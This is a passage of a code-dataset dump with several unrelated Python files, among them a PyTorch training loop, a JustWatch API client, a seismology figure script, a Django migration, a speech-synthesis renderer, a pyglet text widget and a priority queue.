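def save_with_relations(database, parent, children):
    # Parent and children land in the database together or not at all.
    with database.atomic() as transaction:
        try:
            parent.save()
            for child in children:
                child.parent = parent   # hypothetical foreign-key field
                child.save()
        except Exception:
            # Per peewee's docs, a new transaction begins automatically
            # after the call to rollback().
            transaction.rollback()
            raise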
print(\"Epoch:[{0:4}][{1:3}/{2:3}]\\t\"\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'.format(\n epoch, i, len(data_loader), batch_time=batch_time,\n loss=batch_loss))\n\n\nif __name__==\"__main__\":\n\n input=np.random.normal(size=(200000,100))\n target=3*input[:,0]+7*input[:,1]\n input=torch.Tensor(input)\n target=torch.FloatTensor(target)\n ds=TensorDataset(input,target)\n dl=DataLoader(ds,batch_size=1024,shuffle=True)\n\n model=Filter().cuda()\n criterion = nn.SmoothL1Loss().cuda()\n optimizer=torch.optim.Adam(model.parameters(),lr=0.001)\n\n batch_time=AverageMeter()\n batch_loss=AverageMeter()\n epochs=200\n\n model.train()\n\n for epoch in range(epochs):\n train(dl,model,criterion,optimizer,epoch)\n\n pickle.dump(model.state_dict(),open(\"last_model_linear.pickle\",'wb'))\n","sub_path":"analysis/ind_datagen.py","file_name":"ind_datagen.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"61343177","text":"import asyncio\nimport aiohttp\n\n\nclass Request:\n base = \"https://apis.justwatch.com/content\"\n\n def __init__(self, method, endpoint, **kwargs):\n self.method = method\n\n self.params = kwargs.pop(\"params\", None)\n self.data = kwargs.pop(\"data\", None)\n self.json = kwargs.pop(\"json\", None)\n self.headers = kwargs.pop(\"headers\", None)\n\n if endpoint:\n endpoint = endpoint.lstrip(\"/\")\n self.url = f\"{self.base}/{endpoint}\"\n\n @property\n def kwargs(self):\n return dict(\n params=self.params, data=self.data, json=self.json, headers=self.headers\n )\n\n\nclass HTTP:\n def __init__(self, client, *, session=None, loop=None):\n self.client = client\n self.loop = loop or asyncio.get_event_loop()\n self.session = session or aiohttp.ClientSession(loop=self.loop)\n self.locale = None\n\n async def request(self, req, *, override=False):\n if not self.locale and not override:\n await self.client._initialize()\n async with self.session.request(\n req.method, req.url.format(locale=self.locale), **req.kwargs\n ) as resp:\n if resp.status == 200:\n return await resp.json()\n resp.raise_for_status()\n\n async def get_locale(self):\n return await self.request(Request(\"GET\", \"locales/state\"), override=True)\n\n async def search(self, payload):\n return await self.request(\n Request(\"POST\", \"titles/{locale}/popular\", json=payload)\n )\n\n async def get_genres(self):\n return await self.request(Request(\"GET\", \"genres/locale/{locale}\"))\n\n async def get_providers(self):\n return await self.request(Request(\"GET\", \"providers/locale/{locale}\"))\n\n async def get_certifications(self, content_type):\n params = dict(country=self.client.country, object_type=content_type)\n return await self.request(Request(\"GET\", \"age_certifications\", params=params))\n\n async def get_item(self, id, content_type):\n return await self.request(\n Request(\n \"GET\",\n \"titles/{content_type}/{id}/locale/{{locale}}\".format(\n content_type=content_type, id=id\n ),\n )\n )\n\n async def get_season(self, id):\n return await self.request(\n Request(\"GET\", \"titles/show_season/{id}/locale/{{locale}}\".format(id=id))\n )\n","sub_path":"asyncjw/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"492134044","text":"\n### Importing various python libraries\n# numpy is a useful toolkit for scientific computations\nimport numpy 
as np\n# matplotlib is a plotting toolkit\nimport matplotlib.pyplot as plt\n\n\n\nimport matplotlib\nfrom IPython.display import HTML, Image\nmatplotlib.rc('animation', html='html5')\n# import matplotlib.patches as patches\n\nimport matplotlib.pylab as pylab\nparams = {'legend.fontsize': 'large',\n 'figure.figsize': (12.8, 7.2),\n 'xtick.labelsize':'14',\n 'ytick.labelsize':'14'}\npylab.rcParams.update(params)\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.patches as patches\n\nimport sys\nsys.path.append('../')\n\n# Function used to setup ploting area.\nimport setup_plot_area as spa\n\n########################## SET PARAMETERS HERE #############################\n\n# depth of earthquake in km\ndepth_earthquake = 0\n\nradius = 6371 # radius of Earth in km\n\ntitle = 'Movie title'\n\n\n# epi_dist=70\n# theta_earthquake=50\n# LL_L1_text='Earthquake waves travel outwards in all\\n directions from where an earthquake happens'\n# LL_L2_text='These waves can tell us about the material\\n they travel through on their journey'\n# LR_L1_text='\\\"I look at the time it takes for P waves to\\n arrive back at the Earth’s surface\\\"'\n# LR_L2_text='\\\"I image where the mantle is hotter or colder\\n by measuring the variable speeds of the waves\\\"'\n# load_image='Cartoons/Al_from_group_name.png'\n\n# epi_dist=60\n# theta_earthquake=-32\n# LL_L1_text='S-waves are one type of wave that travel\\n outwards in all directions from an earthquake'\n# LL_L2_text='They bounce off the core-mantle boundary,\\n and are sensitive to the structure\\n in the deep mantle'\n# LR_L1_text='\\\"I look for these core-bouncing waves\\n in the seismogram\\\"'\n# LR_L2_text='\\\"I use the shape of the waves to investigate\\n deep mysterious structures\\n like mantle plume anchors\\\"'\n# load_image='Cartoons/Jenny_from_group_name.png'\n\n# epi_dist=145\n# theta_earthquake=-18\n# LL_L1_text='Some energy leaves the earthquake\\n and arrives at the core at a special angle'\n# LL_L2_text='At this specific angle the wave \\'hugs\\' the\\n edge of the core - this is called wave diffraction'\n# LR_L1_text='\\\"I search for core \\'hugging\\' waves\\n in the seismogram\\\"'\n# LR_L2_text='\\\"I locate the mantle plume anchors that cause\\n these waves to arrive from unexpected directions\\\"'\n# load_image='Cartoons/Zhi_from_group_name.png'\n\n# epi_dist=100\n# theta_earthquake=0\n# LL_L1_text='S or transverse waves can only travel\\n through a solid and not a liquid'\n# LL_L2_text='In 1906, British geologist Richard Oldham\\n first noticed that there were no S waves\\n beyond a certain distance from earthquakes'\n# LR_L1_text='This is called a \\'shadow zone\\''\n# LR_L2_text='This was the first clue to the\\n existence of a liquid core!'\n# load_image='Oldham.png'\n\n# epi_dist=120\n# theta_earthquake=10\n# LL_L1_text='P waves traveling through the Earth\\n bounce off interior boundaries'\n# LL_L2_text='In the 1930s Danish scientist Inge Lehmann\\n first recorded an unexpected P-wave arrival\\n that came from the inner-core boundary'\n# LR_L1_text='She argued the core might be\\n changing from a liquid to a solid\\n close to the centre of the Earth!'\n# LR_L2_text=''\n# load_image='Lehmann.png'\n\nepi_dist=179\ntheta_earthquake=78\nLL_L1_text='P waves and S waves are caused\\n by all natural earthquakes'\nLL_L2_text='The faster traveling P waves take only 20 minutes\\n to travel to the opposite side of the Earth!'\nLR_L1_text='Sensitive instruments called seismometers\\n are used to measure the shaking of 
the ground\\n caused by the earthquake waves at the surface'\nLR_L2_text='Waves lose lots of energy as they travel,\\n so when they return to the surface\\n the movements they cause are less than a millimeter!'\nload_image=''\n\n\n# ##################### SET UP THE PLOTTING AREA HERE #######################\n\n# Use this function to setup the intial plto area!\nfig,ax0,axgl,axgm,axgr,axll,axlr,axdi,di_figure,ax1,ax2,ax3,ax4 = spa.setup_plot(title=title,load_image=load_image,image_loc='../../wavefront_movie_images/', background_image_loc='../../wavefront_movie_home_screen/',plot_width=12.8,plot_height=7.2, epi_dist=epi_dist, depth_earthquake=depth_earthquake, polar_plot_offset=theta_earthquake, radius=radius, mirror_key_rp=False)\n\n######################## Additions to plot ax2 - wavefronts #################\n# set polar subplot as current axes\nplt.sca(ax2)\n\n# Pretty earthquake marker.\neq_symbol, = ax2.plot([0], [radius - depth_earthquake],\n marker=\"*\", color=\"#FEF215\", markersize=20, zorder=10,\n markeredgewidth=1.5, markeredgecolor=\"0.3\",\n clip_on=False)\n\n\n# Add seismometer location\nseismom_symbol, = ax2.plot([epi_dist*np.pi/180], [radius+250],\n marker=(3, 0, (60-epi_dist+theta_earthquake)), color='r', markersize=15, zorder=10,\n markeredgewidth=1.5, markeredgecolor=\"0.3\",\n clip_on=False)\n\nax2.set_rmax(radius)\nax2.set_rmin(0.0)\n\n\n###################### Additions to Cartesian plot for the seismogram #######################################\nplt.sca(ax4)\n\niter=0\ndelta=0.1\nTW_duration=300 # Sesimogram window length (s)\ntick_pointer_width=20 # drawing tick length (s)\ntime = np.arange(0, TW_duration, 1);\nt_after_eq=time[0]\namplitude = np.exp(-time/100) * np.sin(time/TW_duration/np.pi*180)\n\nax4.plot(time, amplitude,'r-', linewidth=1)\nmax_amp = np.ceil(np.max(amplitude))\nmin_amp = np.floor(np.min(amplitude))\n\nax4.set_xlim([-tick_pointer_width,TW_duration])\nax4.set_ylim([min_amp,max_amp])\n# \"Drawing tick\" goes from left side of page up until 1s before start.\ntick_x=[-tick_pointer_width, -1]\ntick_y=[amplitude[0],amplitude[0]]\nax4.set_yticks([]) # Hides y-axis labels\n# ax4.set_xticks([]) # Hides x-axis labels\n\n\nx_label_pos = time[0::60]\nx_label_val = [int(i) for i in time[0::60]/60 ]\nax4.set_xticks(x_label_pos)\nax4.set_xticklabels(x_label_val)\nax4.set_xlabel('Time after Earthquake (min)', fontsize=12)\n\nax4.plot(tick_x ,tick_y,'b-', linewidth=2)\n\n# Puts triangle at end of drawing tick\nax4.plot(-5, amplitude[0], marker=(3, 0, (-90)), color='b', markersize=10, zorder=10,\n markeredgewidth=0.5, markeredgecolor=\"0.3\", clip_on=False)\n\nax4.text(TW_duration-(TW_duration/40), max_amp-0.05, 'Time after Earthquake: '+str(t_after_eq)+'s', ha=\"right\", va=\"top\",\n fontsize=12, color='black', bbox=dict(facecolor='white', edgecolor='grey', pad=5.0))\n\nwait_rem=3\nwait_point='.'\nwaiting=wait_rem*wait_point\n\n# # Adds label for waiting arriving earthquakes waves....\nax4.text(0, min_amp+0.05, 'Earthquake waves arriving '+str(waiting), ha=\"left\", va=\"bottom\",\n fontsize=12, color='black')\n\n\n\n# Set invisible text in place for the key phase labelling.\nKey_phase_width=20\nkey_phase_seis_time_end = Key_phase_width\nkey_phase_seis_time_start = 0\nkey_phase_max_amp = 0.5 # np.max(np.abs(seis_data_new[len(time_buffer)+int(np.floor((key_phase_A_time/delta))):len(time_buffer)+int(np.floor((key_phase_A_time + Key_phase_width)/delta)):1]))\n\nrect = patches.Rectangle((key_phase_seis_time_start , -key_phase_max_amp-0.05), Key_phase_width, 
2*(key_phase_max_amp+0.05), fill=False,edgecolor='b', alpha=1, visible=False)\n# Add collection to axes\nphase_box = ax4.add_patch(rect)\n\nphase_label = ax4.text(key_phase_seis_time_end+1, key_phase_max_amp+0.08, 'Wave of interest!', ha=\"left\",va=\"top\",fontsize=12, color='black', visible=False, clip_on=True, bbox=dict(facecolor='white',alpha=0.5,edgecolor='white', pad=0.0)) \n\nphase_label.set_visible(True)\n\nphase_box.set_visible(True)\n\n\n\n\n\n\n\n\n\n\n\nif len(LL_L1_text) > 0:\n # Layer 1 text - left label\n axll.text(0.5, 0.7, LL_L1_text, ha=\"center\", va=\"center\",fontsize=14, color='black', bbox=dict(facecolor='white', edgecolor='white', pad=1.0))\nif len(LL_L2_text) > 0:\n # Layer 2 text - left label\n axll.text(0.5, 0.1, LL_L2_text, ha=\"center\", va=\"center\",fontsize=12, color='black', bbox=dict(facecolor='white', edgecolor='white', pad=1.0))\nif len(LR_L1_text) > 0:\n # Layer 1 text - right label\n axlr.text(0.5, 0.7, LR_L1_text, ha=\"center\", va=\"center\",fontsize=14, color='black',bbox=dict(facecolor='white',edgecolor='white', pad=1.0)) # Add some labels if you wish\nif len(LR_L2_text) > 0:\n # Layer 2 text - right label\n axlr.text(0.5, 0.1, LR_L2_text, ha=\"center\", va=\"center\",fontsize=12, color='black',bbox=dict(facecolor='white',edgecolor='white', pad=1.0)) # Add some labels if you wish\n\n# Plot descriptive image (di) between the labels.\nif len(di_figure) > 0:\n axdi.imshow(di_figure, alpha=1)\n\nplt.show()\n","sub_path":"wavefront_movie/Testing_Scripts/test_fig_layout.py","file_name":"test_fig_layout.py","file_ext":"py","file_size_in_byte":8807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"438736535","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('clients', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Issue',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('date_opened', models.DateField()),\n ('date_closed', models.DateField(null=True)),\n ('reason', models.TextField()),\n ('diagnosis', models.TextField()),\n ('work_cost', models.DecimalField(max_digits=8, decimal_places=2)),\n ('comment', models.TextField()),\n ('car', models.ForeignKey(to='clients.Car')),\n ('client', models.ForeignKey(to='clients.Client')),\n ],\n ),\n migrations.CreateModel(\n name='Part',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=64)),\n ('description', models.TextField()),\n ('cost', models.DecimalField(max_digits=8, decimal_places=2)),\n ],\n ),\n migrations.CreateModel(\n name='Service',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('name', models.CharField(max_length=64)),\n ('description', models.TextField()),\n ('cost', models.DecimalField(max_digits=8, decimal_places=2)),\n ],\n ),\n migrations.AddField(\n model_name='issue',\n name='parts',\n field=models.ForeignKey(to='issues.Part'),\n ),\n migrations.AddField(\n model_name='issue',\n name='services',\n field=models.ForeignKey(to='issues.Service'),\n ),\n 
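The placeholder seismogram in the test_fig_layout record above is a decaying sinusoid, exp(-t/100) * sin(t/TW_duration/pi*180), over a 300 s window. A tiny sketch of that trace on its own, which makes the decay envelope explicit:

import numpy as np

TW_DURATION = 300                       # seismogram window length (s)
t = np.arange(0, TW_DURATION, 1)
envelope = np.exp(-t / 100)             # exponential decay of the shaking
carrier = np.sin(t / TW_DURATION / np.pi * 180)
amplitude = envelope * carrier
assert abs(amplitude[0]) < 1e-12        # the trace starts at rest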
]\n","sub_path":"source/issues/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"564252812","text":"#!/usr/bin/env python3\nimport json\nfrom collections import namedtuple\n\nROOT = \"../..\"\nWWW = \"/www\" # do not change, used by cordova (?)\nLANG = \"/lang\" # do not change, used by gettext (?)\nAPI = \"/api\"\nSRC = \"/src\"\nENGLISH_TEMPLATE = \"/english_template\"\nSTUDIES = \"/studies\"\nFP_DOMAIN = \"first_principles\"\nENCODING = \"UTF-8\"\nLANGUAGES_FILE = \"/languages.cfg\"\nLANGUAGES_JS = \"/languages.js\"\nJS = \"/js\"\nEN = \"/en\"\nSTUDIES_FILE = \"/studies_list.json\"\nPOEDITOR_IMPROVE_TRANSLATION_ID = \"improve_translation_url\"\nPOEDITOR_PROJECT_URL = \"https://poeditor.com/projects/po_edit?id=106095\"\nPOEDITOR_LANGUAGE_ID_FILE = \"poeditor_id.json\"\nLC_MESSAGES = \"/LC_MESSAGES\"\nFLAG_FILE_NAME = \"flag.png\"\n\n\n\nSTUDY_LIST = []\nSTUDY_TAGS = {}\nStudy = namedtuple(\"Study\", \"name title\")\n\nwith open(ROOT + SRC + WWW + STUDIES_FILE) as data:\n studies = json.load(data)\nfor name in studies:\n STUDY_LIST.append(Study(name, studies[name][\"title\"]))\n STUDY_TAGS[name] = studies[name][\"poeditor_tag\"]\n STUDY_LIST.sort()\n \nLANGUAGES_LIST = []\nwith open(ROOT + LANGUAGES_FILE) as data:\n LANGUAGES_LIST = json.load(data)\n\n\n \n\n","sub_path":"script/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"77649767","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nAUTHOR\n\n Sébastien Le Maguer <slemaguer@coli.uni-saarland.de>\n\nDESCRIPTION\n\n Package which contains the STRAIGHT audio rendering\n\nLICENSE\n This script is in the public domain, free from copyrights or restrictions.\n Created: 10 October 2016\n\"\"\"\n\nimport os\nimport logging\n\nfrom multiprocessing import JoinableQueue\n\nfrom rendering.utils.parameterconversion import ParameterConversion\n\nfrom utils import run_shell_command\n\n###############################################################################\n# Functions\n###############################################################################\nclass STRAIGHTRenderer:\n \"\"\"Renderer based on STRAIGHT to generate audio signal\n \"\"\"\n def __init__(self, conf, nb_proc, preserve):\n \"\"\"Constructor\n\n :param conf: the configuration object\n :param out_handle: the handle where the standard output of subcommands is dumped\n :param logger: the logger\n :param nb_proc: the number of process to run\n :param preserve: switch to preserve intermediate files or not\n :returns: None\n :rtype:\n\n \"\"\"\n self.conf = conf\n self.logger = logging.getLogger(\"STRAIGHTRenderer\")\n self.nb_proc = nb_proc\n self.preserve = preserve\n self.MATLAB=\"matlab\"\n\n def straight_part(self, in_path, out_path, gen_labfile_base_lst):\n \"\"\"Achieving the straight generation\n\n :param out_path: the output directory path\n :param gen_labfile_base_lst: the file containing the list of utterances\n :returns: None\n :rtype:\n\n \"\"\"\n\n # Generate STRAIGHT script\n with open(self.conf.STRAIGHT_SCRIPT, 'w') as f:\n # Header\n f.write(\"path(path, '%s');\\n\" % self.conf.STRAIGHT_PATH)\n f.write(\"prm.spectralUpdateInterval = %f;\\n\" % self.conf.SIGNAL['frameshift'])\n f.write(\"prm.levelNormalizationIndicator = 0;\\n\\n\")\n\n # Now some parameters\n 
f.write(\"out_path = '%s';\\n\" % out_path)\n f.write(\"fft_len = %d;\\n\" % 1025) # FIXME: hardcoded\n f.write(\"samplerate = %d;\\n\" % self.conf.SIGNAL[\"samplerate\"])\n f.write(\"basenames = {};\\n\")\n for i in range(1, len(gen_labfile_base_lst)+1):\n base = gen_labfile_base_lst[i-1]\n f.write(\"basenames{%d} = '%s';\\n\" % (i, base))\n f.write(\"\\n\")\n\n f.write(\"nb_frames = [];\\n\")\n for i in range(1, len(gen_labfile_base_lst)+1):\n base = gen_labfile_base_lst[i-1]\n nb_frames = os.path.getsize('%s/%s.f0' % (out_path, base)) / 4\n f.write(\"nb_frames(%d) = %d;\\n\" % (i, nb_frames))\n f.write(\"\\n\")\n\n # Read STRAIGHT params\n nb_elts = len(gen_labfile_base_lst)\n if self.nb_proc != 1:\n f.write(\"parfor i=1:%d\\n\" % nb_elts)\n else:\n f.write(\"for i=1:%d\\n\" % nb_elts)\n\n\n f.write(\"\\ttry\\n\")\n f.write(\"\\t\\tfid_sp = fopen(sprintf('%s/%s.sp', out_path, basenames{i}), 'r', 'ieee-le');\\n\")\n f.write(\"\\t\\tfid_ap = fopen(sprintf('%s/%s.ap', out_path, basenames{i}), 'r', 'ieee-le');\\n\")\n f.write(\"\\t\\tfid_f0 = fopen(sprintf('%s/%s.f0', out_path, basenames{i}), 'r', 'ieee-le');\\n\")\n\n f.write(\"\\t\\tsp = fread(fid_sp, [fft_len nb_frames(i)], 'float');\\n\")\n f.write(\"\\t\\tap = fread(fid_ap, [fft_len nb_frames(i)], 'float');\\n\")\n f.write(\"\\t\\tf0 = fread(fid_f0, [1 nb_frames(i)], 'float');\\n\")\n\n f.write(\"\\t\\tfclose(fid_sp);\\n\")\n f.write(\"\\t\\tfclose(fid_ap);\\n\")\n f.write(\"\\t\\tfclose(fid_f0);\\n\")\n\n # Synthesis process part 2\n f.write(\"\\t\\t[sy] = exstraightsynth(f0, sp, ap, samplerate, prm);\\n\")\n f.write(\"\\t\\taudiowrite(sprintf('%s/%s.wav', out_path, basenames{i}), sy, samplerate);\\n\")\n\n f.write(\"\\tcatch me\\n\")\n f.write(\"\\t\\twarning(sprintf('cannot render %s: %s', basenames{i}, me.message));\\n\")\n f.write(\"\\tend;\\n\")\n f.write(\"end;\\n\")\n\n # Ending\n f.write(\"quit;\\n\")\n\n # Synthesis!\n cmd = '%s -nojvm -nosplash -nodisplay < %s' % (self.MATLAB, self.conf.STRAIGHT_SCRIPT)\n run_shell_command(cmd, self.logger)\n\n if not self.preserve:\n os.remove(self.conf.STRAIGHT_SCRIPT)\n # for base in gen_labfile_base_lst:\n # os.remove('%s/%s.sp' % (out_path, base))\n # os.remove('%s/%s.ap' % (out_path, base))\n # os.remove('%s/%s.f0' % (out_path, base))\n\n\n\n def parameter_conversion(self, in_path, out_path, gen_labfile_base_lst):\n \"\"\"Convert acoustic parameters to STRAIGHT compatible parameters\n\n :param out_path: the output directory path\n :param gen_labfile_base_lst: the file containing the list of utterances\n :returns: None\n :rtype:\n\n \"\"\"\n\n # Convert duration to labels\n q = JoinableQueue()\n processs = []\n for base in range(self.nb_proc):\n t = ParameterConversion(self.conf, out_path, self.preserve, q)\n t.start()\n processs.append(t)\n\n for base in gen_labfile_base_lst:\n q.put(base)\n\n\n # block until all tasks are done\n q.join()\n\n # stop workers\n for i in range(len(processs)):\n q.put(None)\n\n for t in processs:\n t.join()\n\n def render(self, in_path, out_path, gen_labfile_base_lst):\n \"\"\"Rendering\n\n :param out_path: the output directory path\n :param gen_labfile_base_lst: the file containing the list of utterances\n :returns: None\n :rtype:\n\n \"\"\"\n self.logger.info(\"Parameter conversion (could be quite long)\")\n self.parameter_conversion(in_path, out_path, gen_labfile_base_lst)\n\n self.logger.info(\"Audio rendering (could be quite long)\")\n self.straight_part(in_path, out_path, 
gen_labfile_base_lst)\n","sub_path":"rendering/straightrenderer.py","file_name":"straightrenderer.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"114841829","text":"import time\r\nstart_time = time.time()\r\ntarget_input = open(\"input.txt\" , \"r\")\r\nseats = target_input.read().split(\"\\n\")\r\ndel seats[-1]\r\n\r\ndef check_adjacents(array, x, y):\r\n adjacents = []\r\n for i in range(x - 1,x + 2):\r\n for j in range(y - 1,y + 2):\r\n if not (i == x and j == y) and ( i >= 0 and j >= 0):\r\n try:\r\n adjacents.append(array[i][j])\r\n except:\r\n pass\r\n \r\n return adjacents\r\n\r\nactual_layout = []\r\nfor seat in seats:\r\n actual_layout.append(list(seat))\r\n\r\nprevious_layout = []\r\n\r\nwhile previous_layout != actual_layout:\r\n previous_layout = []\r\n for line in actual_layout:\r\n previous_layout.append(line.copy())\r\n for i in range(0, len(actual_layout)):\r\n for j in range(0, len(actual_layout[0])):\r\n if actual_layout[i][j] == \"L\":\r\n adjacents = check_adjacents(previous_layout, i, j)\r\n if adjacents.count(\"#\") == 0:\r\n actual_layout[i][j] = \"#\"\r\n elif actual_layout[i][j] == \"#\":\r\n adjacents = check_adjacents(previous_layout, i, j)\r\n if not adjacents.count(\"#\") < 4:\r\n actual_layout[i][j] = \"L\"\r\n\r\ncount = 0\r\nfor line in actual_layout:\r\n count = count + line.count(\"#\")\r\n\r\nprint(count)\r\n\r\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n\r\n","sub_path":"day11/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"206184438","text":"import requests\r\nimport json\r\nfrom bs4 import BeautifulSoup\r\n\r\nURL = 'https://superheroapi.com/ids.html'\r\n\r\nheroes_page = requests.get(URL).text\r\nheroes_parser = BeautifulSoup(heroes_page, 'html.parser')\r\nheroes_data = {}\r\n\r\nfor row in heroes_parser.find_all('tr'):\r\n ids, name = row.find_all('td')[0].get_text(), row.find_all('td')[1].get_text()\r\n heroes_data[name] = ids\r\n\r\nwith open('heroes_data.json', 'w+') as f:\r\n json_data = json.dumps(heroes_data)\r\n f.write(json_data)","sub_path":"get_heroes_data.py","file_name":"get_heroes_data.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"302005710","text":"result_list = []\nlist1 = [1, 2]\nlist2 = [3, 4]\nlist3 = [5, 6]\nlist4 = [7, 8, 9]\ntuple1 = (11, 12)\ntuple2 = (13, 14)\ntuple3 = (15, 16)\ntuple4 = (17, 18, 19)\nlis = [list1, list2, list3, list4]\ntup = [list((tuple1)), list((tuple2)), list((tuple3)), list((tuple4))]\nopList = []\n\n\ndef otpList(lis, tup):\n usIp = int(input(\"Enter 1 for tuple and 2 for list : \"))\n if(usIp == 1):\n for i in range(8):\n if (i % 2 == 0):\n opList.append(tup[int(i / 2)])\n else:\n opList.append(lis[int(i / 2)])\n elif(usIp == 2):\n for i in range(8):\n if (i % 2 == 0):\n opList.append(lis[int(i/2)])\n else:\n opList.append(tup[int(i/2)])\n else:\n print(\"WRONG INPUT SORRY !!!\")\n exit()\n return opList\n\n\nprint(otpList(lis, tup))\n","sub_path":"Tuple Problems/misc-optimal.py","file_name":"misc-optimal.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"41313931","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport pyglet\nfrom pyglet.gl import 
*\nfrom .shape import Rectangle\nfrom .widget import Widget\nimport sys, traceback\n\n# ----------------------------------------------------------------------- EditBox\nclass EditBox(Widget):\n ''' EditBox widget\n \n Simple text edit field\n '''\n\n # _________________________________________________________________ __init__\n def __init__(self, window, x=0, y=0, z=0, width=0, height=0, pad=(5,3),\n font_size = 10, anchor_x='left', anchor_y='bottom',\n text=''):\n\n fg = (.4,.4,.8, 1)\n fgint = (150, 150, 200, 255)\n bg = (.1,.1,.2, 1)\n self.xpad,self.ypad = pad\n\n #\n self.document = pyglet.text.document.UnformattedDocument(text)\n self.document.set_style(0, len(self.document.text), \n dict(color=fgint, font_size=font_size)\n )\n\n font = self.document.get_font()\n fheight = font.ascent - font.descent\n\n layout = pyglet.text.layout.IncrementalTextLayout(\n self.document, width, fheight, multiline=False)\n \n self.caret = pyglet.text.caret.Caret(layout, color=(255,255,255))\n self.on_unset_focus()\n \n #\n if width == 0 and len(text) > 0:\n width = layout.content_width + 2 * self.xpad\n elif width == 0:\n width = 200\n \n if height == 0:\n height = layout.content_height + 2 * self.ypad\n\n #\n layout.x = self.xpad\n layout.y = self.ypad\n #layout.height = \n layout.width = width - 2*self.xpad\n\n frame = Rectangle( x=0, y=0, z=z,\n width=width, height=height, radius=0,\n foreground=fg, background=bg,\n anchor_x=anchor_x, anchor_y=anchor_y)\n\n self.text_cursor = window.get_system_mouse_cursor('text')\n\n #\n Widget.__init__( self, x, y, z, width, height, anchor_x, anchor_y) \n\n self._elements['frame'] = frame\n self._elements['layout'] = layout\n #\n def update_width(self):\n self._elements['frame'].width = self.width\n self._elements['layout'].width = self.width - 2*self.xpad\n \n #\n def update_height(self):\n self._elements['frame'].height = self.height\n #self._elements['layout'].height = \n\n #\n def on_mouse_press(self, x, y, button, modifiers):\n if self.hit_test(x,y):\n self.set_focus(self)\n self.caret.on_mouse_press(x-self._root_x, y-self._root_y, button, modifiers)\n return pyglet.event.EVENT_HANDLED\n \n if self.caret.visible:\n self.set_focus(None)\n \n return pyglet.event.EVENT_UNHANDLED\n\n\n #\n def on_text(self, text):\n self.caret.on_text(text)\n\n #\n def on_text_motion(self, motion):\n self.caret.on_text_motion(motion)\n \n #\n def on_text_motion_select(self, motion):\n self.caret.on_text_motion_select(motion)\n\n #\n def on_unset_focus(self):\n self.caret.visible = False\n self.caret.mark = 0\n self.caret.position = 0\n\n #\n def on_set_focus(self):\n self.caret.visible = True\n self.caret.mark = 0\n self.caret.position = len(self._elements['layout'].document.text)\n\n #\n def _get_text(self):\n return self.document.text\n\n def _set_text(self, text):\n self.document.text = text\n\n text = property(_get_text, _set_text,\n doc='''text data displayed by the widget\n\n :type: string\n ''')\n","sub_path":"PyWidget3/editbox.py","file_name":"editbox.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"142102718","text":"import heapq\n\nclass PriorityQueue:\n\n 'initialize pq with a member heap and a counter of the members it contains'\n def __init__(self):\n self.heap = []\n self.size = 0\n \n 'push an entry into pq using its priority and his id into the heap'\n def push(self,item,priority):\n entry = (priority,self.size,item)\n heapq.heappush(self.heap,entry)\n 
self.size+=1\n    \n    'pop out the entry with the smallest priority'\n    def pop(self):\n        if(self.size > 0):\n            priority, counter, item = heapq.heappop(self.heap)\n            self.size += -1\n            return item\n        else:\n            return \"Attention. There is no item to remove\"\n\n    'Find out whether the heap is empty based on its size'\n    def isEmpty(self):\n        if(self.size == 0):\n            return True\n        else:\n            return False\n\n    'check if an entry belongs to the pq and update it or push it if needed'\n    def update(self,item,priority):\n        i = 0\n        flag = False\n\n        if(self.size > 0):\n            while(i < self.size):\n                f_priority, f_counter, f_item = self.heap[i]\n\n                if(f_item == item):\n                    flag = True\n\n                    if(f_priority > priority):\n                        del self.heap[i]\n                        self.push(item,priority)\n                    \n                    break\n\n                i += 1\n\n        if not flag:\n            self.push(item,priority)\n\n\nif __name__ == \"__main__\":\n    q = PriorityQueue()\n","sub_path":"project0/priorityQueue.py","file_name":"priorityQueue.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
